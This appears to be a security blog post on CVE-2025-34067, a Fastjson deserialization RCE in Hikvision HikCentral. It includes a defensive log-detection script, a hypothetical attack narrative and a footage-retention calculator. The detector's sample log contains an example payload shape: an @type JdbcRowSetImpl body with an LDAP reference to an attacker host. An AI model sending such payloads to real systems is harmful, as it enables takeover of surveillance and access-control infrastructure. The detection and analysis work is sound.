In mid-2025, security researchers uncovered a critical vulnerability in Hikvision's HikCentral Professional software—identified as CVE‑2025‑34067—that received a maximum severity score of CVSS 4.0 = 10.0. This rating represents the highest possible level of danger in the Common Vulnerability Scoring System, indicating that the flaw is:
Remotely exploitable over the network (AV:N)
Low complexity to exploit (AC:L)
Requires no authentication (PR:N)
Grants complete control over the system (VC:H, SC:H, SA:H)
The vulnerability exists in the applyCT endpoint (/bic/ssoService/v1/applyCT) of HikCentral, where an attacker can exploit unsafe deserialization in the outdated Fastjson library. By submitting specially crafted JSON data pointing to an attacker-controlled LDAP server, it is possible to execute arbitrary code on the target system without any prior access or authentication.
Because HikCentral is widely used in enterprise environments to manage thousands of security cameras, access control systems, and integrated security workflows, exploitation of this flaw could result in complete takeover of a physical security infrastructure.
This blog post examines the technical nature of CVE‑2025‑34067, explores possible attack vectors, compares it to past Hikvision vulnerabilities, and highlights what attackers could realistically achieve—from disabling surveillance to manipulating video feeds or silently observing facilities in real time.
What Is CVE‑2025‑34067 — and Why Is It a 10.0?
At the heart of the issue is CVE‑2025‑34067, a newly disclosed unauthenticated Remote Code Execution (RCE) flaw in the applyCT endpoint of Hikvision's HikCentral platform. Scored CVSS 4.0 = 10.0, it represents the most critical threat level: an attacker needs no credentials and no user interaction, and can fully compromise any affected system reachable over the network.
Unpacking the danger:
Network attack vector (AV:N): Can be triggered over the internet.
Low complexity (AC:L): No special conditions needed.
Unauthenticated (PR:N/UI:N): Anyone can hit the endpoint.
Complete system compromise (VC:H…SA:H): Full access to containers, services, cameras, feeds, and beyond.
Fastjson’s auto-type feature, reachable through /bic/ssoService/v1/applyCT, trusts unverified JSON input. By sending payloads referencing malicious Java classes (like JdbcRowSetImpl) that resolve via an attacker-controlled LDAP server, the attacker achieves full RCE.
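Because HikCentral is a closed product, defenders cannot change its Fastjson configuration; what they can do is watch the unauthenticated endpoint. The following is an added example, not code from the original post or from Hikvision: a log-review rule that flags requests to /bic/ssoService/v1/applyCT whose body carries the markers the post describes (Fastjson auto-type, the JdbcRowSetImpl class, an LDAP reference). The log line format and the sample lines are constructed assumptions; adapt LOG_RE to what your reverse proxy or WAF actually writes.

```python
import re

# Assumed log format for this example: "<src> <method> <path> <status> body=<json>"
# Real proxies differ; only LOG_RE should need changing.
SUSPECT_PATH = "/bic/ssoService/v1/applyCT"

# Indicators drawn from the write-up: the Fastjson auto-type key, the
# JdbcRowSetImpl class the post names, and an outbound LDAP reference.
INDICATORS = {
    "fastjson_autotype": re.compile(r'"@type"\s*:'),
    "jdbcrowset_class": re.compile(r"JdbcRowSetImpl"),
    "ldap_reference": re.compile(r"\bldaps?://", re.IGNORECASE),
}

LOG_RE = re.compile(
    r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) body=(?P<body>.*)$"
)

def classify(line):
    """Return None for lines that do not touch applyCT, otherwise a finding dict."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    if m["path"].split("?", 1)[0] != SUSPECT_PATH:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(m["body"])]
    # applyCT needs no authentication (PR:N), so every call is worth a record;
    # gadget-class or LDAP markers in the body escalate the record to an alert.
    severity = "alert" if hits else "info"
    return {"src": m["src"], "status": m["status"], "severity": severity, "indicators": hits}

def scan(log_text):
    """Run classify() over a log blob and return only the alert-level findings."""
    findings = (classify(l) for l in log_text.splitlines() if l.strip())
    return [f for f in findings if f and f["severity"] == "alert"]

# Constructed sample log (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = """\
10.20.0.5 POST /bic/ssoService/v1/applyCT 200 body={"token":"session-abc","userId":"42"}
203.0.113.7 POST /bic/ssoService/v1/applyCT 500 body={"@type":"com.sun.rowset.JdbcRowSetImpl","x":"ldap://203.0.113.7:1389/a"}
203.0.113.9 GET /portal/index.html 200 body=
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Treat every external source reaching applyCT as worth reviewing even at "info" level, since the endpoint should normally only be hit from the management network.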
A Potential Exploit Attack
Recon & Prepping the Payload
Our hacker, “ShadowBroker42,” scans the internet for exposed HikCentral servers. They find one, vulnerable and wide open. Using a public PoC exploit that crafts JSON pointing to their LDAP server, RCE is executed silently.
Gaining Foothold & Escalation
The payload spawns a shell under the HikCentral service account. They pivot to the host OS, grab domain credentials, and start moving laterally onto camera DVRs, storage systems, even the building’s access control.
Turning Cameras Against You
ShadowBroker42 issues commands to:
Stop camera processes, darkening critical views.
Delete video archives, wiping historical evidence.
Stream live feeds back to themselves, monitoring staff movements.
Manipulate PTZ cameras, aiming them at blind spots or away from intruders.
With full admin privileges, they disable alarm triggers and insert fake feeds—making a real break-in look like nothing.
Keep in mind that this is just one of many possible attack chains. An attacker could instead deploy ransomware, quietly monitor secure areas (say, R&D labs), or pursue anything else they find useful.
Surveillance as a Double-Edged Sword: When Cameras Create a False Sense of Security
Many organizations invest heavily in surveillance systems under the assumption that more cameras equal better security. High-resolution IP cameras, centralized monitoring platforms like HikCentral, and motion-triggered recording give the impression of a watchful, evidence-rich environment. But that confidence is often misplaced—particularly when camera systems are not designed with adversarial threats in mind.
The belief that cameras automatically make spaces safer overlooks a critical reality: surveillance systems can be turned against you just as easily as they can help you, especially when systems are poorly configured, unpatched, or trusted blindly without verification.
This issue is not limited to software vulnerabilities like CVE‑2025‑34067, which allow attackers to remotely compromise and take control of the camera network. Even the intended functionality of a surveillance system can become a liability.
Take, for example, a key operational weakness described in The Man Who Wasn’t There: the assumption that recorded video footage will always be available when needed. Here I outline how modern HD surveillance systems generate massive amounts of data, especially when recording continuously at high resolution. As a result, most organizations only retain footage for a few days before older data is overwritten to save disk space.
This creates a dangerous window of vulnerability:
If an attacker is not detected quickly,
If logs and footage are not reviewed within a short time frame,
Then any trace of their presence may be lost forever.
That case is an example of how an attacker can exploit this exact limitation. They entered a secured facility, conducted their operation without being noticed, and because the intrusion wasn’t flagged within the short retention period, the surveillance system recorded over the only evidence of the breach. No forensic trail. No way to review camera footage. It was as if the intruder had never been there at all.
This isn’t a CVE, but it is a vulnerability which many are unaware of. It reflects a common misunderstanding: that having cameras means you have security. In reality, without strong retention policies, threat detection capabilities, and proactive monitoring, surveillance systems can lull organizations into a false sense of control.
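To put numbers on the retention argument above, here is an added example (not from the original post) that estimates how many days an NVR holds before overwriting, whether an intrusion is still on disk when it is finally noticed, and how much storage a target retention needs. Camera counts, bitrates and storage sizes in the block are constructed illustrations, not vendor figures.

```python
# Retention-window planner for a continuously recording camera estate.
# All figures passed in below are constructed examples, not measured values.

def _bytes_per_day(cameras, mbps_per_camera, duty_cycle):
    """Bytes written per day: Mbps -> bytes/s, times seconds/day, times recording fraction."""
    return cameras * (mbps_per_camera * 1e6 / 8) * 86400 * duty_cycle

def retention_days(storage_tb, cameras, mbps_per_camera, duty_cycle=1.0):
    """Days of footage the array holds before the oldest recordings are overwritten.

    duty_cycle is the fraction of each day a camera actually records
    (1.0 = continuous; lower values model motion-triggered recording).
    """
    return storage_tb * 1e12 / _bytes_per_day(cameras, mbps_per_camera, duty_cycle)

def evidence_survives(retention, dwell_days):
    """True if footage of an intrusion at day 0 is still on disk after dwell_days."""
    return dwell_days < retention

def storage_for_retention(target_days, cameras, mbps_per_camera, duty_cycle=1.0):
    """Terabytes needed so that footage survives for target_days."""
    return target_days * _bytes_per_day(cameras, mbps_per_camera, duty_cycle) / 1e12

if __name__ == "__main__":
    # Constructed scenario: 64 cameras at 4 Mbps each, 20 TB of recorder storage.
    keep = retention_days(20, 64, 4)
    print(f"retention: {keep:.1f} days")
    # An intrusion discovered 10 days later has already been overwritten.
    print("evidence survives 10-day dwell:", evidence_survives(keep, 10))
    print(f"storage for 30 days: {storage_for_retention(30, 64, 4):.1f} TB")
```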
Conclusion
With a CVSS score of 10.0, CVE‑2025‑34067 represents the highest level of risk, enabling adversaries to disable cameras, delete video evidence, and monitor live feeds without ever being detected.
Organizations relying on Hikvision infrastructure must treat this vulnerability as an urgent priority and take immediate action to patch, isolate, and harden their surveillance systems.
For Black Teams, this is a vulnerability you should be aware of, and auditors should check for it and offer remediation.
Didn't expect you to cover a software vuln. Nice job!